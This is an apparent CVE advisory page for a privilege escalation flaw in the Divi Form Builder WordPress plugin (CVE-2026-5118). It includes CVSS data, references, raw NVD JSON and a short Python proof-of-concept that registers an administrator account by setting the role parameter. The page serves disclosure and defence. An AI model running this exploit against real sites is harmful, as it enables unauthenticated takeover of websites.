CVE-2026-5118

Description

The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled 'role' parameter from POST data during user registration without validating it against the form's configured default_user_role setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Divi Form Builder <= 5.1.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Target URL (replace with actual vulnerable endpoint) target_url = "http://example.com/wp-admin/admin-ajax.php" # Payload data demonstrating the privilege escalation payload = { "action": "divi_form_builder_process_registration", "username": "attacker_admin", "email": "[email protected]", "password": "StrongPassword123!", "role": "administrator" # Vulnerable parameter: The plugin accepts this without validation } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent successfully. Check if admin account was created.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-5118
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-5118
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-5118/
[4] VulDB https://vuldb.com/cve/CVE-2026-5118
[5] https://diviengine.com/divi-form-builder-changelog/
[6] https://www.wordfence.com/threat-intel/vulnerabilities/id/72154404-f956-4ea2-96ec-166ade87885f?source=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-5118", "sourceIdentifier": "[email protected]", "published": "2026-05-21T13:16:20.013", "lastModified": "2026-05-21T15:19:30.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Divi Form Builder plugin for WordPress is vulnerable to privilege escalation in versions up to, and including, 5.1.2. This is due to the plugin accepting a user-controlled 'role' parameter from POST data during user registration without validating it against the form's configured default_user_role setting. This makes it possible for unauthenticated attackers to create administrator accounts by tampering with the role parameter during registration."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-269"}]}], "references": [{"url": "https://diviengine.com/divi-form-builder-changelog/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/72154404-f956-4ea2-96ec-166ade87885f?source=cve", "source": "[email protected]"}]}}